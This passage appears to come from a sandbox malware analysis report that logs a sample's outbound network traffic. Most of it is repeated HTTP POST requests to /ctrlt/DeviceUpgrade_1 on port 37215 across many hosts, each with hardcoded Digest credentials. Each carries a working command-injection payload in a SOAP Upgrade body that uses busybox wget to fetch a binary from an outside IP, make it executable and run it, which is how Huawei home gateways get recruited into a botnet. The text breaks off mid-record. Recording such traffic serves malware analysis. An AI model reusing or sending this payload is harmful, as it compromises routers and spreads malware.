2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1503192.168.2.155520641.198.119.9037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107676029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1504192.168.2.154086241.226.184.9937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107680082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1505192.168.2.153281441.91.149.20737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107681036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1506192.168.2.155774241.82.34.7437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107697010 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1507192.168.2.155525241.57.135.14337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107717037 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1508192.168.2.154403241.91.216.9937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107722044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1509192.168.2.155795041.90.130.14337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107736111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1510192.168.2.155616841.114.34.3937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107747078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1511192.168.2.154463241.141.138.24137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107788086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1512192.168.2.154714841.241.48.937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107789040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1513192.168.2.155069241.30.240.9437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107795000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
